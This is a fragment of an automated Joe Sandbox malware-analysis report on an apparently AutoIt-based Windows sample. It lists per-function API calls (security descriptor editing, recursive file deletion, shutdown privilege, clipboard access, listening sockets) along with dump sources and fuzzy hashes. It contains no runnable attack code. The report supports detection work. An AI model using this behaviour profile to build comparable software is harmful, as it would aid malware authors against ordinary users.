                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 0040EE9D
                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 0040EEB0
                                                                                                                      • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0040EEE4
                                                                                                                      • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0040EF2C
                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0040EF64
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0040EF99
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 3616455698-4108050209
                                                                                                                      • Opcode ID: e2d4655c5fb0481b9738a4e5615adc7a01cbb89f672374ac2261a901d81bfa57
                                                                                                                      • Instruction ID: 8841360919652cb3e40d6f8224c27d5316e2d411b97e720ff8181436cd23b404
                                                                                                                      • Opcode Fuzzy Hash: e2d4655c5fb0481b9738a4e5615adc7a01cbb89f672374ac2261a901d81bfa57
                                                                                                                      • Instruction Fuzzy Hash: 6D81AE71608302AFD720DF16C884A6BBBE4FF88354F04093EF994A7291D774D911CB9A
                                                                                                                      Function 003DB398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003DB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 003DB903
                                                                                                                        • Part of subcall function 003DB8E7: GetLastError.KERNEL32(?,003DB3CB,?,?,?), ref: 003DB90D
                                                                                                                        • Part of subcall function 003DB8E7: GetProcessHeap.KERNEL32(00000008,?,?,003DB3CB,?,?,?), ref: 003DB91C
                                                                                                                        • Part of subcall function 003DB8E7: RtlAllocateHeap.NTDLL(00000000,?,003DB3CB), ref: 003DB923
                                                                                                                        • Part of subcall function 003DB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 003DB93A
                                                                                                                        • Part of subcall function 003DB982: GetProcessHeap.KERNEL32(00000008,003DB3E1,00000000,00000000,?,003DB3E1,?), ref: 003DB98E
                                                                                                                        • Part of subcall function 003DB982: RtlAllocateHeap.NTDLL(00000000,?,003DB3E1), ref: 003DB995
                                                                                                                        • Part of subcall function 003DB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,003DB3E1,?), ref: 003DB9A6
                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003DB3FC
                                                                                                                      • _memset.LIBCMT ref: 003DB411
                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003DB430
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 003DB441
                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 003DB47E
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003DB49A
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 003DB4B7
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003DB4C6
                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 003DB4CD
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 003DB4EE
                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 003DB4F5
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003DB526
                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003DB54C
                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 003DB560
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2347767575-0
                                                                                                                      • Opcode ID: 8c1878c7828ab73aef47cc22476d8a8944f5fa8a8fb270e8663e62d509dc344e
                                                                                                                      • Instruction ID: e5c5b318677ebc8c231264c44db1dcc2a485b26965ba4b3a68362fd943a3bde6
                                                                                                                      • Opcode Fuzzy Hash: 8c1878c7828ab73aef47cc22476d8a8944f5fa8a8fb270e8663e62d509dc344e
                                                                                                                      • Instruction Fuzzy Hash: BA515E72A00209EBDF11DFA5EC45AEEBB79FF05304F05812AE915AB261DB31DA05CB64
                                                                                                                      Function 003E6E4A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 003A31DA
                                                                                                                        • Part of subcall function 003E7C0C: GetFileAttributesW.KERNEL32(?,003E6A7B), ref: 003E7C0D
                                                                                                                      • _wcscat.LIBCMT ref: 003E6E7E
                                                                                                                      • __wsplitpath.LIBCMT ref: 003E6E99
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 003E6EAE
                                                                                                                      • _wcscpy.LIBCMT ref: 003E6EDD
                                                                                                                      • _wcscat.LIBCMT ref: 003E6EEF
                                                                                                                      • _wcscat.LIBCMT ref: 003E6F01
                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 003E6F0E
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 003E6F22
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003E6F3D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 2643075503-1173974218
                                                                                                                      • Opcode ID: 81bac360588ef303d633a584c57df83f04ea7494f0acc8a53bb7019fe8bd163d
                                                                                                                      • Instruction ID: 278fa8b8774e96a7192a6e7ec0cc5d4601747fd96b155d30bc28a70079bf6306
                                                                                                                      • Opcode Fuzzy Hash: 81bac360588ef303d633a584c57df83f04ea7494f0acc8a53bb7019fe8bd163d
                                                                                                                      • Instruction Fuzzy Hash: 5C21B472408384AEC212EBA0D8459DF77DC9B99354F444A1EF5D4C3082EB30D60D87A2
                                                                                                                      Function 003F7294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1737998785-0
                                                                                                                      • Opcode ID: 13a03570fb31be200e5d58917955472643b0209e1bb25f70cc5c4e8fe390272b
                                                                                                                      • Instruction ID: 7caa4463ff57d0340d785a0c3a98c9495f13526fefebded47b95249c51a58689
                                                                                                                      • Opcode Fuzzy Hash: 13a03570fb31be200e5d58917955472643b0209e1bb25f70cc5c4e8fe390272b
                                                                                                                      • Instruction Fuzzy Hash: EE21C735704114AFDB22AF24DC49B6D77A8EF44710F01802AFA0ADB2A1DB70ED429B99
                                                                                                                      Function 0040EAA6 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 149nativewindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                        • Part of subcall function 003BB736: GetCursorPos.USER32(000000FF), ref: 003BB749
                                                                                                                        • Part of subcall function 003BB736: ScreenToClient.USER32(00000000,000000FF), ref: 003BB766
                                                                                                                        • Part of subcall function 003BB736: GetAsyncKeyState.USER32(00000001), ref: 003BB78B
                                                                                                                        • Part of subcall function 003BB736: GetAsyncKeyState.USER32(00000002), ref: 003BB799
                                                                                                                      • ReleaseCapture.USER32 ref: 0040EB1A
                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 0040EBC2
                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0040EBD5
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0040ECAE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID$@U=u
                                                                                                                      • API String ID: 973565025-2104563098
                                                                                                                      • Opcode ID: d1c6629c68bb47d9abdba347044c3297fe9984edc6e6c0436c30c7b49b971334
                                                                                                                      • Instruction ID: 5fe5b1768b6c50a6970280810551f93979c4959bba32dc52ebb0ddd82218c1f8
                                                                                                                      • Opcode Fuzzy Hash: d1c6629c68bb47d9abdba347044c3297fe9984edc6e6c0436c30c7b49b971334
                                                                                                                      • Instruction Fuzzy Hash: 8651CC71204304AFD710EF24CC56FAA7BE4FB88704F004A2EF5919B2E2DB749914CB56
                                                                                                                      Function 003F24A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 003F24F6
                                                                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 003F2526
                                                                                                                      • _wcscmp.LIBCMT ref: 003F253A
                                                                                                                      • _wcscmp.LIBCMT ref: 003F2555
                                                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 003F25F3
                                                                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 003F2609
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 713712311-438819550
                                                                                                                      • Opcode ID: ee72c9b33a29ca9c527e0790dcff0e2bb5a3ac7c7c9f91e33188cfd09a1af196
                                                                                                                      • Instruction ID: dbbab24c0ca0eab4bc1d7ab826ff64adda8e0b682eb1b165a5f1b8cf65a13354
                                                                                                                      • Opcode Fuzzy Hash: ee72c9b33a29ca9c527e0790dcff0e2bb5a3ac7c7c9f91e33188cfd09a1af196
                                                                                                                      • Instruction Fuzzy Hash: 1B415C7190021EEFCF16DFA4CC59AEFBBB4FF05310F20445AE919A6191E7749A54CB50
                                                                                                                      Function 003A8CA0 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1058COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                      • API String ID: 0-1546025612
                                                                                                                      • Opcode ID: c978768965e501edef3c6bac7fba354fc7d36987c775ed7ff512aaf2a4f433db
                                                                                                                      • Instruction ID: 16cfd5f4326619b6628e2657a1cc8a9362eebf495dd57e85dabba3ca5a1b86c4
                                                                                                                      • Opcode Fuzzy Hash: c978768965e501edef3c6bac7fba354fc7d36987c775ed7ff512aaf2a4f433db
                                                                                                                      • Instruction Fuzzy Hash: FF92AB75E0022ACBDF25CF58D8807AEB7B1FB55314F6582ABD816AB380D7349D81CB94
                                                                                                                      Function 003A8530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104443479-0
                                                                                                                      • Opcode ID: d8171b1e559fc9246b9ea10359de56fa796d99f8605da7237e909a2f7bd04ad9
                                                                                                                      • Instruction ID: b0085948481cddcf13e7176d38b7e00e5f5f9fe2d80aef42cae5cf9665030b5e
                                                                                                                      • Opcode Fuzzy Hash: d8171b1e559fc9246b9ea10359de56fa796d99f8605da7237e909a2f7bd04ad9
                                                                                                                      • Instruction Fuzzy Hash: 54126A70A006099FDF05DFA5DA81AEEB7B5FF49300F20452AE406EB251EB36A961CB54
                                                                                                                      Function 003E82D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003DBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003DBF0F
                                                                                                                        • Part of subcall function 003DBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003DBF3C
                                                                                                                        • Part of subcall function 003DBEC3: GetLastError.KERNEL32 ref: 003DBF49
                                                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 003E830C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                      • String ID: $@$SeShutdownPrivilege
                                                                                                                      • API String ID: 2234035333-194228
                                                                                                                      • Opcode ID: bf924fb580b42749a97a476a6b7514c25d5d71a448d2d429621f6bec5fd1fe78
                                                                                                                      • Instruction ID: 944f34475c614381c2d6103346e79869d1143a4caa11f12c308c2ed33f5d8614
                                                                                                                      • Opcode Fuzzy Hash: bf924fb580b42749a97a476a6b7514c25d5d71a448d2d429621f6bec5fd1fe78
                                                                                                                      • Instruction Fuzzy Hash: 6A01FC7DF40371ABE76A17798C4BBB7725C9B00B80F150B35F917E61D2DE50AC0181A4
                                                                                                                      Function 003F91DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003F9235
                                                                                                                      • WSAGetLastError.WS2_32(00000000), ref: 003F9244
                                                                                                                      • bind.WS2_32(00000000,?,00000010), ref: 003F9260
                                                                                                                      • listen.WS2_32(00000000,00000005), ref: 003F926F
                                                                                                                      • WSAGetLastError.WS2_32(00000000), ref: 003F9289
                                                                                                                      • closesocket.WS2_32(00000000), ref: 003F929D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279440585-0
                                                                                                                      • Opcode ID: 320245bde084e6156c43c739bd28d3a908d7d634c6f036c195b84f972bd2e55e
                                                                                                                      • Instruction ID: 2a693985a758a6a771a2203048c10cea05160203cc4fcfc7dd0234ef990f01dd
                                                                                                                      • Opcode Fuzzy Hash: 320245bde084e6156c43c739bd28d3a908d7d634c6f036c195b84f972bd2e55e
                                                                                                                      • Instruction Fuzzy Hash: E621D831600608AFCB11EF64CC85B7EB7A9EF85314F11455AFA56AB3D1C734AD41CB51
                                                                                                                      Function 003A6670 Relevance: 8.1, APIs: 2, Strings: 2, Instructions: 1093COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: hNE$tME
                                                                                                                      • API String ID: 4104443479-3216842091
                                                                                                                      • Opcode ID: 03547a852255a09a8ef46b8adb58e925d6efc07378c412c9d7d22cd0b7b7a9f4
                                                                                                                      • Instruction ID: a1d4ebe1a84e00ea8af28c282b89ceb2fa65ec91678e8e897ce223008e26cffc
                                                                                                                      • Opcode Fuzzy Hash: 03547a852255a09a8ef46b8adb58e925d6efc07378c412c9d7d22cd0b7b7a9f4
                                                                                                                      • Instruction Fuzzy Hash: 0FA2BEB4E00219CFCB25CF58C9806ADBBB5FF49314F6981AAD819AB390D7789D81CF54
                                                                                                                      Function 003AA0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003C010A: std::exception::exception.LIBCMT ref: 003C013E
                                                                                                                        • Part of subcall function 003C010A: __CxxThrowException@8.LIBCMT ref: 003C0153
                                                                                                                      • _memmove.LIBCMT ref: 00413020
                                                                                                                      • _memmove.LIBCMT ref: 00413135
                                                                                                                      • _memmove.LIBCMT ref: 004131DC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
